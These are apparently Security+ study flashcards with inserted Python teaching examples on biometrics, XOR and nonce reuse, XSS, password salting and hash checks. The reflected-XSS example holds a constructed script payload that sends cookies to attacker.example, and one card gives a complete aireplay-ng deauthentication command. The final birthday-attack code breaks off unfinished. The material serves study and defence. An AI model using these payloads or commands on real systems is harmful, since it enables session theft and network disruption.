Digital signatures (2)

A hash of the message is signed with the sender's private key and can be verified with the sender's public key. Provides authentication, non-repudiation and integrity.

SASL stand for?

Simple Authentication and Security Layer

WPS

Simple Wi-Fi setup method (push button or PIN) with a design flaw in how the PIN is validated

Memory/buffer vulnerabilities and types (5 types)

Since applications execute in memory, manipulating memory can manipulate the application. Types include: memory leak, integer overflow, buffer overflow, pointer dereference, DLL injection

what services can you disable on an application server?

Since application servers have very specific functionality, every other service running on the device can be disabled.

Hierarchical CA (2)

A single root CA issues certificates to intermediate CAs, which issue the end-entity certificates. Distributes the certificate management load.

(PKI) trust models (5)

Single CA, hierarchical, mesh, web of trust, mutual authentication

Things Group Policy can administer

Sites, domains, OUs, groups, location, or any combination of AD administrative boundaries.

Something you have examples (4)

Smart card. USB token. Hardware or software tokens. Your phone.

Tokens and cards examples (4)

Smart card. USB token. Hardware or software tokens. phone.

MAC OS Update options (2)

Software Update. (old name) App Store

Google Mail is an example of which cloud deployment model?

Software as a service

Ransomware

Software that encrypts programs and data until a ransom is paid for the decryption key.

Difference between MOA and MOU

Some consider an MOA a step up from an MOU, but the terms are often used interchangeably.

WPA2 concerns

Some older hardware could not run it, since AES/CCMP requires additional computing resources.

Personnel issues: Policy violation (2 eg)

Someone violates the AUP, e.g. transfers information or visits a prohibited website

camera systems security concerns

Someone with access over IP would know when people are around and what physical security is in place.

Example of compliance issues with personal email policies

Some organizations are legally required to prohibit personal email from a business account (example of)

NTLM vulnerabilities

Some systems store NTLM hashes for backwards compatibility. Vulnerable to credential forwarding (relay) attacks: credentials captured from one computer are used to gain access to another

Data owner (2)

Someone at the executive level with administrative responsibility for the application and data. Responsible for signing off on the compliance of the data

Tuples examples

Source IP, Destination IP, port number, time of day, application, etc

Role-based awareness training

Specialized training that is customized to the specific role that an employee holds in the organization.

ways to harden a system (3)

Specific guides: Check Manufacturer's site. Internet Interest Groups. General-purpose guides

Separation of duties (2)

Split knowledge. Dual control

Kerberos timeline

Standard since the 1980s (developed at MIT). Microsoft started using it in Windows 2000, and it is supported by every Windows version since.

X.500 Attribute ST

State. A state, province, or county within a country.

SAST stands for?

Static Application Security Testing

How antivirus deals with viruses (2)

Stops it from downloading or executing and quarantines it in a separate part of storage. The signature list needs constant updating, since thousands of new viruses are released every day.

RAID 0 (3)

Striping data across multiple drives without parity. High performance. No fault tolerance

RAID 5 (3)

Striping with parity. Fault tolerant (survives the loss of one drive). Requires one additional disk for the redundancy

IEEE 802.1x authentication process (7)

Supplicant tries to communicate. Authenticator sends an EAP-Request to the supplicant asking for its identity. Supplicant sends its username in an EAP-Response. Authenticator forwards it to the authentication server. If the identity is valid, the server proposes a protected exchange (e.g. a TLS tunnel), which the authenticator passes to the supplicant. Supplicant sends its credentials. Server validates them and the authenticator opens the port to the network.

EAP-TTLS

Supports other authentication protocols in a TLS secure tunnel.

IEEE 802.1x: Authenticator (2)

Switch or wireless access point between the supplicant and the authentication server. Sometimes has the authentication server built in.

Securing Network address allocation against DHCP Starvation Attack (2)

Switches can be configured (port security) to limit the number of MAC addresses per interface and to disable an interface when too many MAC addresses are seen

Session keys (2)

Symmetric session keys generated by the client and sent encrypted with the server's public key; the server decrypts them with its private key. (This is RSA key exchange. TLS 1.3 instead derives session keys with ephemeral Diffie-Hellman, so a later compromise of the server's private key does not expose past sessions.)

Reporting requirements/escalation: External contact examples

System owner. Law enforcement. US-CERT (if working for the US Government)

Load balancer features (6)

TCP offloading. SSL offload. Caching. QoS. Content switching (balancing applications differently between servers). Managing load between servers

WPA concerns

TKIP has vulnerabilities and was deprecated.

One of the more common OTP methods used by Google, Facebook, Microsoft

TOTP (uses)

Hardware root of trust Examples (2)

TPM. HSM

Cross-site request forgery

Takes advantage of the trust a web application has in the user's browser: by getting the user to click a link (e.g. in an email), the attacker's request is sent with the user's session cookies, as if the user had sent it.

IP spoofing

Using someone else's IP address, or pretending to be an IP address from outside the network.

What environment does quality assurance check for bugs?

Test environment

Sarbanes-Oxley Act (SOX)

The Public Company Accounting Reform and Investor Protection Act of 2002. established sweeping auditing and financial regulations for public companies. helps protect shareholders, employees and the public from accounting errors and fraudulent financial practices.

(Digital certificate) Version

The X.509 version supported (V1, V2, or V3)

(Digital certificate) Signature Algorithm

The algorithm used by the CA to sign the certificate.

Cryptanalysis

The art of breaking encryption without the key

DoS

The forced failure of a service, making it unavailable to legitimate users.

(Digital certificate) Issuer

The name of the CA, expressed as a Distinguished Name (DN).

(Digital certificate) Subject

The name of the certificate holder, expressed as a Distinguished Name (DN).

carrier unlocking (2)

The process of unlocking a phone from a cellular provider after a certain number of payments or period of use. Locking phones to a carrier is illegal in certain countries.

Crossover error rate (3)

The rate at which FAR and FRR are equal. Adjust the sensitivity (acceptance threshold) until both values are equal. A lower rate indicates a more accurate biometric system.
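An added example, not part of the original card set, that computes FAR, FRR and the crossover point from constructed biometric match scores (0 to 100). The score lists are made up; in practice they would come from a test population.

```python
# Added example (not from the original card set): FAR/FRR/CER from constructed
# match scores. A higher score means the sample looks more like the enrolled template.
GENUINE = [95, 90, 85, 80, 75, 70, 60, 45, 40, 30]   # enrolled user re-scanned
IMPOSTOR = [5, 10, 15, 20, 25, 30, 40, 50, 60, 70]   # other people against the template


def accept(score: int, threshold: int) -> bool:
    return score >= threshold


def error_rates(threshold: int, genuine=GENUINE, impostor=IMPOSTOR):
    """(FAR, FRR) at a threshold.
    FAR = impostors accepted / impostor attempts   (security failure)
    FRR = genuine users rejected / genuine attempts (usability failure)"""
    far = sum(accept(s, threshold) for s in impostor) / len(impostor)
    frr = sum(not accept(s, threshold) for s in genuine) / len(genuine)
    return far, frr


def crossover(genuine=GENUINE, impostor=IMPOSTOR, thresholds=range(0, 101, 5)):
    """Threshold where FAR and FRR are closest, plus the two rates there.
    Ties resolve to the lowest threshold."""
    best = min(thresholds,
               key=lambda t: (abs(error_rates(t, genuine, impostor)[0]
                                  - error_rates(t, genuine, impostor)[1]), t))
    far, frr = error_rates(best, genuine, impostor)
    return best, far, frr


if __name__ == "__main__":
    for t in (30, 50, 80):
        far, frr = error_rates(t)
        print(f"threshold {t:3}: FAR={far:.2f} FRR={frr:.2f}")
    t, far, frr = crossover()
    print(f"crossover at threshold {t}: CER={far:.2f}")
```

Lowering the threshold lets more impostors in (FAR rises) while turning away fewer legitimate users (FRR falls); raising it does the reverse. The CER summarises the system in one number, but a deployment picks the threshold for its own risk: a data-centre door runs above the crossover, a phone unlock below it.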

X.509

The standard format for digital certificates.

data exfiltration (2)

The unauthorized transfer of data outside an organization. Made easy when networks are high-speed and people can walk in and remove data on USB drives, DVDs, etc.

Passive monitoring

The use of an IPS on a network tap or port mirror (SPAN) to examine a copy of the traffic. Can't block traffic, only alert.

How worms are usually installed

They move through the network and infect systems that have known, unpatched vulnerabilities

How are false Positives identified

Time-consuming: each triggering signature has to be researched and resolved

(Incident Response) Exercise (5)

Time to test your incident response teams. Have well-defined rules of engagement. Usually a very specific scenario. Might be a tabletop exercise. Document and discuss the response.

Fighting Jamming

To overwhelm the good signal the bad signal must be close by. Fox hunting: use a directional antenna and an attenuator to locate the source.

Fighting tailgating (4)

Train users on policies and to ask questions. Visitor policy: visitors must wear badges. Mechanical doors that admit one person per scan, mantraps, airlocks that remember whether a person is already inside.

Principles of social engineering: Familiarity

Tries to get you to like them so you want to do things for them

Sandboxing use during the development process (2)

Try out code and implement new systems without affecting the production environment. Supports incremental development.

Reasons for MAC spoofing (4)

To circumvent a MAC-based ACL. To bypass a Wi-Fi address filter. Can also be done for legitimate reasons: an internet provider expects a certain MAC address; certain applications require a particular MAC address

Integer overflow

Storing a value too large for the integer type that holds it; the excess wraps around, producing a wrong (often small or negative) number that can later undersize a buffer or bypass a length check and so affect the application.

what is Blowfish's successor?

Twofish (succeeded what?)

Network OS

Type of OS that connects many devices over a network connection

Server OS

Type of OS that provides a particular service usually a server.

Typo squatting (2)

Type of URL hijacking where the URL is misspelled. Misspelled URLs can be sold, redirected to competitors, or used as phishing or drive-by download sites.

Worm

Type of malware that spreads quickly through the network without user help.

IV

Type of nonce that provides randomization for encryption, so the same plaintext encrypted with the same key does not produce the same ciphertext

Explicit proxy

Type of proxy where computers must be configured at the OS or browser level to use the proxy for internet access.

WannaCry (3)

Worm that: installs on networks with the Microsoft SMBv1 vulnerability; uses the EternalBlue exploit to install a backdoor that in turn installs an updated version of the worm; encrypts the computer and demands bitcoin payment for decryption while continuing to spread through the network.

UTM (11)

URL filter/content inspection. Malware inspection. Spam filter. CSU/DSU. Router, switch. Firewall. IDS/IPS. Bandwidth shaper. VPN endpoint. Logs with filters

Things seen on a WAF log

URL, Attack Name, logged or denied, etc

Misconfigured content filters (2)

URLs may not be specific enough for blocking. Some protocols may not be filtered, e.g. HTTPS, whose content can't be inspected without TLS interception

AES uses (2)

US Federal Government standard. WPA2

Types of Jamming (5)

Unintentional: interference from microwave ovens, fluorescent lights, etc. Intentional (malicious): constant random bits; constant legitimate frames; random (sent at random times); reactive (jams only when someone tries to communicate)

UAV stands for?

Unmanned Aerial Vehicle

Unauthorized software (4)

Untested software that may contain malware, spyware or ransomware. Conflicts: may conflict with the organization's mission-critical software. Licensing: all software must be legal. Ongoing support: the creator must provide updates, security patches and new versions, and policy must ensure everything is kept updated

(Account management) auditing best practice

Usage and permission auditing and time-of-day restrictions can be automated: receive alerts and logs of issues to resolve.

Authentication tools used for RADIUS Federation (3)

Use 802.1x as the authentication method. RADIUS on the backend. EAP to authenticate.

Mobile Application management (2)

Use MDM to add and manage application whitelisting on devices. New applications have to be checked and added to the list

Mobile Device Camera use security (2)

Use MDM to disable the camera, or use geofencing to disable it in sensitive locations.

Recovery (for forensics) (2)

Use strategic intelligence and counterintelligence gathering to strengthen security based on the forensic data gathered.

IEEE 802.1X Certificate-based authentication

Use certificate stored on devices to gain access to the network.

Supply chain security (3)

Use trusted vendors. Make sure purchased devices were not previously connected to the internet. Verify that hardware and firmware are genuine.

Where OAuth is used

Used in Twitter, Google, Facebook, LinkedIn, and more

examples of places LDAP is used (3)

Used in: Windows Active Directory. Apple OpenDirectory. OpenLDAP. etc

Code signing certificate security

The user's OS checks the signature and validates that the software hasn't been modified. If validation fails, the user can stop the application from executing and contact the developer

Access control models (5)

Users receive rights based on these: - MAC - DAC - ABAC - Role-based access control - Rule-based access control

Kerberos security

Uses mutual authentication between client and server, with time-stamped tickets, to protect against MITM and replay attacks.

SSL VPN (4)

Uses SSL/TLS over TCP 443, from a browser or a lightweight VPN client, to connect to VPN devices across many OSes. Almost no firewall issues. No full VPN client, digital certificates or shared secrets (as with IPsec) required

How is NFC used as an identity system?

Uses an access token stored in the phone to identify you

how does DNSSEC add authentication and integrity?

Uses public key cryptography: DNS records are signed by the zone's key, with a chain of trust up to the root zone. The signatures are stored in the DNS (RRSIG records) alongside the data, so a resolver can verify the records it receives.

Secure Honeynet Topology

Using multiple honeypots together to attract attackers and study their methods.

How a botnet is usually installed

Usually installed by email link, Trojan horse or vulnerability in the OS or an application.

Online CA

Usually the intermediate CAs, which carry the load of issuing certificates while the root CA stays offline.

(Digital certificate) Extensions (4 eg)

V3 certificates can be defined with extended attributes, such as friendly subject or issuer names, contact email addresses, and intended key usage.

Logical Segmentation (3)

VLANs logically separate networks on one switch. A router (or layer 3 switch) is needed to connect them.

Data owner examples (2)

VP of Sales owns the customer relationship data. Treasurer owns the financial information

Off-site backups (3)

Vaulting. E-vaulting. can be organizationally owned or 3rd-party.

Parties that have access to extranets

Vendors, suppliers

DNSSEC (3)

Verifies responses: Origin authentication. data integrity

Digital certificate fields (8)

Version, Serial Number, Signature Algorithm, Issuer, Valid From / Valid To, Subject, Public Key, Extensions

VMI stands for?

Virtual Mobile Infrastructure

Security CASB provides (4)

Visibility- see who is using what apps. Compliance. Threat prevention. Data security- encryption and DLP

Problem with WEP

Weaknesses in its use of the RC4 cipher with short (24-bit), reused initialization vectors

Embed system vulnerabilities (2)

Vulnerabilities in everyday devices that run an OS the user can't access and that is rarely or never updated. Most have internet access, making them convenient targets for attackers

firewalls that block SQL injection

WAF

deprecated algorithms examples (2)

WEP. DES (56-bit keys)

examples of Weak security configurations (5)

WEP (vulnerable RC4 use and IVs). WPA (TKIP). DES (56-bit keys). 3DES. SHA-1 (hash collisions)

(WPA-)Enterprise aka

WPA-802.1x

(WPA-)PSK (2)

WPA2 with a pre-shared key. Everyone uses the same 256-bit key, derived from the passphrase and the SSID.

High availability security

Watch for single points of failures.

Development life-cycle models (2)

Waterfall. Agile

service account examples (2)

Web server, database server, etc

Server OS examples (2)

Web server. Database server

Things to separate with Distributed allocation (5)

Web servers. Database servers. Middleware. security devices. monitoring systems

Location of logs for DEP

Windows Event Viewer

OS Update options (8)

Windows: Windows Update, Windows Server Update Services (WSUS) from a central console. Mac OS: Software Update, App Store. Linux: yum, apt-get, rpm, graphical front-ends

Windows OS Update options (2)

Windows Update. Windows Server Update services (WSUS) from central console

Kerberos

Network authentication protocol (used by Windows Active Directory, among others) that provides SSO: after one authentication, tickets grant access to services without re-authenticating.

Group Policy (2)

Windows policies that let you apply administrative and security settings to the OS of all systems globally. Linked to AD administrative boundaries.

Examples of Role-based access control uses

Windows uses it through Windows groups

OS that support Secure Boot (5)

Windows. Linux: Fedora, openSUSE, Ubuntu. Apple uses its own EFI implementation

WPA2

Wireless encryption protocol that uses AES for data confidentiality, with CCMP (Counter Mode with CBC-MAC) providing per-frame integrity and authentication.

Peripherals security can be applied to (7)

Wireless keyboards. Wireless mice. Displays. WiFi-enabled MicroSD cards. Printers/MFDs. External storage devices. Digital cameras

Secure Wireless Topology (2)

Wireless work network that should be internal and separate from guest networks, and should use secure authentication.

LDAP standard

Based on the X.500 standard

How to get back the original plaintext from an XOR ciphertext?

XOR the ciphertext again with the same key.
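An added example, not part of the original card set, covering this card and the IV card above: XOR encryption and decryption as the same operation, and what goes wrong when the nonce/IV that randomizes the keystream is reused. The keystream is derived with SHA-256 from key, nonce and a counter purely for illustration; a real design uses an authenticated cipher such as AES-GCM or ChaCha20-Poly1305.

```python
import hashlib
from itertools import count

# Added example (not from the original card set). A stream cipher is XOR with a
# keystream; applying the same XOR again recovers the plaintext.


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings up to the length of the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Illustrative keystream: SHA-256(key || nonce || counter) blocks.
    The nonce/IV is what makes the stream differ between messages under one key."""
    out = b""
    for block in count():
        out += hashlib.sha256(key + nonce + block.to_bytes(4, "big")).digest()
        if len(out) >= length:
            return out[:length]


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


decrypt = encrypt  # XOR is its own inverse: c XOR ks == p


def nonce_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """If two messages were encrypted with the same key AND the same nonce, the
    keystreams cancel: c1 XOR c2 == p1 XOR p2, with no key needed."""
    return xor_bytes(c1, c2)


def recover_with_crib(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """With the leak and a known (or guessed) plaintext p1, p2 falls out directly."""
    return xor_bytes(nonce_reuse_leak(c1, c2), known_p1)


if __name__ == "__main__":
    key = b"sixteen byte key"                 # constructed
    p1 = b"Transfer $100 to account 4242"
    p2 = b"Transfer $999 to account 1337"
    c1 = encrypt(key, b"nonce-A", p1)
    print(decrypt(key, b"nonce-A", c1))      # round trip
    c2 = encrypt(key, b"nonce-A", p2)        # same nonce reused: mistake
    print(recover_with_crib(c1, c2, p1))     # p2 recovered without the key
```

The same failure applies to any stream mode, including AES-CTR and AES-GCM: the key can be perfect and the cipher unbroken, and reusing the IV still turns the problem into one of guessing plaintext.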

Non-persistent (reflected) XSS attack (3)

XSS attack where a script is injected through a website's input or search box. The crafted link is emailed to victims; because the page reflects the input back, the script embedded in the URL executes in the victim's browser. The script can send credentials, session IDs or cookies to the attacker.
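An added example, not part of the original card set: a search page that reflects the q parameter into its HTML, shown in its vulnerable form and with output encoding applied. The site name, attacker host and payload are constructed.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Added example (not from the original card set): reflected XSS and its fix.

PAGE = "<h1>Results for: {term}</h1>"


def search_term(url: str) -> str:
    """Pull the q parameter out of a URL as a web framework would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url: str) -> str:
    # Raw reflection: whatever the link carried becomes part of the page's markup.
    return PAGE.format(term=search_term(url))


def render_fixed(url: str) -> str:
    # Output encoding: <, >, &, " and ' become entities, so the browser shows the
    # payload as text instead of executing it.
    return PAGE.format(term=html.escape(search_term(url), quote=True))


# Constructed phishing link: the script ships the victim's cookie to the attacker.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
EVIL_URL = "https://shop.example/search?q=" + quote(PAYLOAD)


def contains_live_script(rendered_html: str) -> bool:
    """Crude detector a WAF or test might use: an unescaped script tag in the output."""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("link sent to victim:", EVIL_URL)
    print("vulnerable:", render_vulnerable(EVIL_URL))
    print("fixed     :", render_fixed(EVIL_URL))
```

Escaping on output is the fix that holds regardless of where the input came from; input validation on its own misses encodings the check did not anticipate. Marking the session cookie HttpOnly limits what a successful payload can steal, but does not stop the script from acting as the user while the page is open.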

Directional antennas examples (2)

Yagi, parabolic

On-premise (infrastructure) (2)

Your servers are in your data center. All applications are on local hardware

split knowledge

a Separation of duties where no one person has all the details

Raspberry Pi 3 (2)

A SoC built around a Broadcom BCM2837 chip. Has a separate controller chip for the USB and Ethernet interfaces.

Vulnerability and Penetration testing authorization

A best practice: written authorization limits the legal liability of testing (it does not remove it entirely) and sets how invasive you are allowed to be.

Certificate chaining (2)

A chain of trust listing all certificates between the server and the root CA. Starts with the server's SSL/TLS certificate, continues through the intermediate (chain) certificates, and ends with the root CA certificate

Exit interviews (2)

A common tool used by HR to gather statistics and track changes. A formal process with statistical record keeping.

Snapshots (2)

A complete copy of a system's state at a specific date and time. Can be taken by the hypervisor in a virtual environment.

Waterfall development model

a development model that follows sequential design process

Agile Development Model (3)

A development model where many tasks are performed at once to get working code created as quickly as possible as a starting point. Involves customer collaboration. Changes can be made very quickly.

AUP

A document signed by users that identifies what is and isn't appropriate on an organization's network.

False Positive on IPS

a false alarm or mistaken identity of an intrusion.

DEP

A function in certain OSes that marks memory pages as non-executable, so only pages meant for code can run; injected data (e.g. shellcode placed in a buffer) cannot be executed

Dictionary attack (2)

A method to determine passwords by trying common words first. Word lists are widely available online

How to update an immutable system?

a new iteration has to be deployed.

Salt

A nonce (random value) combined with a password before hashing, so identical passwords produce different hashes and precomputed tables are useless.
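An added example, not part of the original card set, covering this card and the dictionary attack card above: the same word list run against unsalted MD5 and against salted, iterated PBKDF2. The word list and passwords are constructed, and the iteration count is kept low so the demo runs quickly; production counts are far higher.

```python
import hashlib
import hmac
import os

# Added example (not from the original card set): why salting defeats
# precomputed dictionary tables, and why iteration adds cost per guess.

WORDLIST = ["123456", "password", "qwerty", "letmein", "hunter2", "dragon"]  # constructed
ITERATIONS = 20_000  # demo value; use a far higher count in production


def md5_hex(pw: str) -> str:
    return hashlib.md5(pw.encode()).hexdigest()


def crack_md5(target_hashes):
    """One precomputed table cracks every unsalted hash at once."""
    table = {md5_hex(w): w for w in WORDLIST}
    return {h: table.get(h) for h in target_hashes}


def hash_password(pw: str, salt: bytes = None) -> str:
    """Store salt, iteration count and derived key together: the salt is not secret."""
    salt = salt or os.urandom(16)  # fresh nonce per password
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(pw: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


def crack_pbkdf2(stored_hashes):
    """No shared table is possible: every word is re-derived for every salt."""
    return {s: next((w for w in WORDLIST if verify_password(w, s)), None)
            for s in stored_hashes}


def work_factor(n_users: int):
    """Hash computations the attacker needs for a full word-list pass."""
    return {"md5": len(WORDLIST),
            "pbkdf2": n_users * len(WORDLIST) * ITERATIONS}


if __name__ == "__main__":
    users = {"alice": "hunter2", "bob": "hunter2"}
    md5_db = {u: md5_hex(p) for u, p in users.items()}
    print("unsalted: alice == bob ->", md5_db["alice"] == md5_db["bob"])
    print("cracked:", crack_md5(md5_db.values()))
    salted_db = {u: hash_password(p) for u, p in users.items()}
    print("salted: alice == bob ->", salted_db["alice"] == salted_db["bob"])
    print("cost for 1000 users:", work_factor(1000))
```

The salt does not stop a dictionary attack on one weak password; it stops one table from cracking every account at once, and the iteration count decides how much each guess costs.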

Order of restoration (2)

A predefined list, set by organization management, of applications and the priority in which they are restored. Priorities may change during different parts of the year.

Open proxy (e.g)

A proxy owned by a third party, commonly used to circumvent existing security controls, e.g. to get around URL filtering.

Reverse proxy (2 eg)

A proxy that takes inbound traffic from the internet and forwards it to internal services, usually a server or multiple servers

Evil twin (2)

A rogue access point configured exactly like an existing network. Can overpower the legitimate access point so that users connect to the attacker's access point instead.

Dual control

a separation of duties where both people must be present to perform a business function

Standard operating procedure

a set of step-by-step instructions compiled by an organization to help workers carry out complex routine operations

Secret algorithm (2 def)

(1) A shared symmetric key that needs to be replaced if discovered. (2) An algorithm that is kept private, which is discouraged since experts can't test it for flaws or weaknesses.

UEFI/BIOS

A standard implementation in the manufacturer's hardware that connects the computer's firmware and the OS.

password length

A strong password is at least 8 characters; longer is better.

Phishing

a technique to gain personal information through social engineering and/or spoofing.

Code quality and testing: Sandboxing

A test environment that looks and works exactly like the production environment.

Application cells/containers

A virtualization space that uses just the resources needed to run an application instead of launching an entire VM.

Macro virus

A virus that is part of a macro associated with documents such as spreadsheets or word processing files.

Heartbleed

A vulnerability (CVE-2014-0160) disclosed in April 2014, where an OpenSSL flaw put the private keys of affected web servers at risk.

False positive

A reported vulnerability that doesn't actually exist

nikto

A vulnerability scanner designed to scan web servers and report information about them

Platforms, networks and OS RADIUS supports (3)

A wide variety of platforms and devices. Available on almost any server OS. Works on any network, not just dial-in.

Disassociation (2)

A wireless attack that removes a device from the network by taking advantage of 802.11 management frames, which lack encryption and authentication unless 802.11w (protected management frames) is in use. Sends a constant stream of disassociation or deauthentication frames to the device

BPA

a written agreement that details the relationship between business partners, including their obligations toward the partnership.

EMI leakage

The ability to listen to EMI emissions from devices to reconstruct user keystrokes, video, etc.

Rogue access point (2)

Access points plugged into a network to bypass authentication. Can also be created by wireless sharing (a hotspot) on an already authenticated OS.

shared account

account that can be used by more than one person

service accounts

accounts used exclusively by services running on a computer

Privileged accounts (2)

Accounts with elevated or complete access to one or more systems. Often used to manage hardware, drivers, and software installation

Provisioning application software security

Add security components to the OS and application as part of provisioning

DLL injection

Adding a malicious library and manipulating the OS or application into loading it, so the attacker's code runs inside the process.

context-aware authentication (3 eg)

Adding or combining context for additional authentication: where you normally log in from (IP address), where you frequent (GPS information), devices normally paired (Bluetooth), and others

"Noah's Ark" of networking

adding pairs of systems and devices to maintain the uptime and availability

Continuing education (security procedures)

additional training as security environments change.

SRTP (2)

Secure RTP: adds AES to encrypt the voice/video flow. adds HMAC-SHA1 for authentication, integrity, and replay protection.

Refactoring examples (7)

adding NOP instructions, loops and pointless code strings; reordering functions; modifying application flow; reordering code and inserting unused data types.

Infrastructure as code security

cloud-based security tools are deployed by the same automation as the infrastructure devices they protect, so every instance comes up with its controls already in place.

Role-based access control (2)

the administrator grants access based on the user's role in the organization, usually through group membership. rights granted to a group are implicitly inherited by groups nested within it.

example of Privileged accounts (2)

administrator, root

Who adverse actions affect

affects applicants and can affect existing employees

How to check integrity of a file downloaded online

after downloading, compute the file's hash (e.g. SHA-256) and compare it with the value the publisher posted. The posted value must come from a trusted channel (an HTTPS page or a signed checksum file); an attacker who can replace the download on a mirror can replace an unsigned hash beside it too.
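Added example (not from the flashcards): a Python script that does this check the way a download page expects, hashing in chunks so large files never have to fit in memory and parsing a sha256sum-style line. The file contents and the published checksum line are constructed for the demo; the digest is computed in the script only because the file is made up.

```python
import hashlib
import io

# Constructed sample standing in for a downloaded file (not a real package).
SAMPLE_FILE = b"example-tool-1.0.tar.gz: constructed sample contents for the demo\n"

# Constructed sample of the line a publisher posts in a SHA256SUMS file:
# "<hex digest><two spaces><file name>". The digest is computed here only
# because the file is made up; in real life it comes from the publisher's site.
PUBLISHED_LINE = hashlib.sha256(SAMPLE_FILE).hexdigest() + "  example-tool-1.0.tar.gz"


def hash_stream(fileobj, algorithm="sha256", chunk_size=1 << 20):
    """Hash a file-like object in chunks so a multi-gigabyte download never has to fit in RAM."""
    h = hashlib.new(algorithm)
    for chunk in iter(lambda: fileobj.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def parse_sums_line(line):
    """Parse a sha256sum/md5sum-style line. Accepts 'digest  name' and 'digest *name' (binary mode)."""
    digest, _, name = line.strip().partition(" ")
    name = name.lstrip(" *")
    if not name or not digest or any(c not in "0123456789abcdefABCDEF" for c in digest):
        raise ValueError("malformed checksum line: %r" % line)
    return digest.lower(), name


def verify_download(fileobj, published_line, algorithm="sha256"):
    """True only if the file's digest equals the published one. The length check means a
    truncated line or a digest from a different algorithm can never match by accident."""
    expected, _name = parse_sums_line(published_line)
    actual = hash_stream(fileobj, algorithm)
    return len(expected) == len(actual) and expected == actual


def verify_bytes(data, published_line, algorithm="sha256"):
    """Convenience wrapper for a download already read into memory."""
    return verify_download(io.BytesIO(data), published_line, algorithm)
```

A single changed byte anywhere in the file changes the whole digest, so the comparison fails on the tampered copy; the check says nothing about who published the file, which is what a signature over the checksum list adds.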

CSR

Certificate Signing Request: after creating a key pair, the public key plus identifying information is sent to the CA to be signed. The private key never leaves the requester.

SLA

agreement between two parties that dictates the minimum level of service that will be provided.

Disassociation command

aireplay-ng -0 100 -a <BSSID of the AP> -c <MAC address of the target> wlan0mon   (-0 = deauthentication mode, 100 = number of frames to send, 0 would mean unlimited; wlan0mon is the interface in monitor mode)

DEP aka for AMD (2?)

aka Enhanced Virus Protection; implemented as the NX (No-eXecute) page-protection bit

SCADA aka

aka ICS

DEP aka

aka No-eXecute bit

SSL offload aka

aka SSL termination

DEP aka for Intel

aka XD bit (eXecute Disable)

Disassociation aka

aka deauthentication

low-severity vulnerability aka

aka informational/low priority vulnerability

access violations aka

aka segmentation fault

Session Hijacking aka

aka sidejacking, cookie hijacking

server-side validation

all checks of data occur on the server.

Incremental Backup Recovery process

restore the last full backup, then apply every incremental backup taken since it, in order.

Active/active load balancing

all servers are active and load balancer can use any of the servers at any time. (Round robin and affinity are referred to this type)

What updates are required for a newly installed OS?

all service packs and security patches

How HIDS/HIPS protects a system

allow/deny traffic based on signatures

NFC (4)

allows 2-way close wireless communication. used in payment systems. bootstrap for other wireless like Bluetooth pairing. Uses access tokens usually builtin to our mobile devices for encrypted payments

Single sign-on

allows access to everything on a network with a single authentication.

NTP

allows all devices to synchronize their clocks automatically; accuracy is typically better than 1 millisecond on a LAN with a local time source (tens of milliseconds across the internet). Consistent clocks are what make log correlation across systems possible.

VM escape vulnerability

allows bad guys to break out of VM containers and interact with the host OS or hardware.

WiFi Direct/Ad hoc security concerns

allows bad guys to more easily connect to users

Corporate-owned deployment model Security

allows corporate data to not mix with personal

camera systems (2)

allows for 24/7 monitoring in home or office. These days recorders and camera communicate through TCP/IP

Cloud (Infrastructure) (2)

allows for entire application instances to be created and torn down on-demand. resources are available as needed (so you don't have to pay for extra hosting and time)

Push notification services

allows information to be pushed onto a mobile device screen without input from the user

SNMPv3

allows management of network devices that includes: confidentiality. Integrity. Authentication

Mobile Device Hotspot/tethering (2)

allows phone to become a wireless router for other devices. may require additional charges and data costs from provider

host availability (eg)

allows the implementation of cloud elasticity to build up and scale down lots of resources e.g. new server deployed with few mouse clicks.

SDN

allows to orchestrate and automate everything done in the networking environment.

Hypervisor (2)

allows virtualization. allocates memory, CPU, security and other resources required for VMs.

ad hoc mode

allows wireless devices to be manually configured to connect directly to each other without an AP.

WiFi Direct

allows wireless devices to use a discovery method to connect directly to each other without an AP

Capture system image security (5)

allows you to analyze a copy of the drive data without affecting the original. use a bootable device to make the copy without writing to the drive. remove the physical drive to prevent data overwrites. a hardware write blocker lets you read but not write to a drive. data may also be backed up on tapes.

How to properly add Remote wipe function to a device (3)

already enabled when you add a device to an MDM. make user agree to policy when adding. or configure it using a set of credentials

Data-in-use concerns

always decrypted so the CPU can work on it; an attacker with access to the system can read the information straight out of RAM.

Site-to-site VPN tunnel(2)

an always-on tunnel between two sites. some implementations tear the tunnel down after a period of no traffic and rebuild it when new traffic appears.

Forward proxy (2)

an "internal proxy" commonly used to protect and control user access to the internet. Provides URL filtering (disallowing visiting some sites)

Trusted OS (2)

an OS evaluated against the Common Criteria to an Evaluation Assurance Level (EAL). EAL4 is the most widely accepted minimum; EAL7 is the highest.

Adverse action (2 def)

an action that denies employment based on the background check. can also deny employment, credit, insurance, or some other benefit, due to consumer, credit, or criminal history.

Birthday attack

an attack that finds two different inputs with the same hash (a collision) by brute force. For an n-bit hash a collision is expected after about 2^(n/2) attempts, far fewer than the 2^n needed to match one specific hash; the attacker can then swap a benign document for a malicious one that validates against the same hash value.
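Added example, not part of the original cards: a Python demo of the birthday bound, using SHA-256 truncated to 16 bits as a stand-in for a short hash so the search finishes instantly. The truncation and the message prefixes are choices made for the demo, not a weakness of SHA-256; the contrast with matching one specific hash is the point.

```python
import hashlib
import math
from itertools import count


def truncated_hash(data: bytes, bits: int) -> int:
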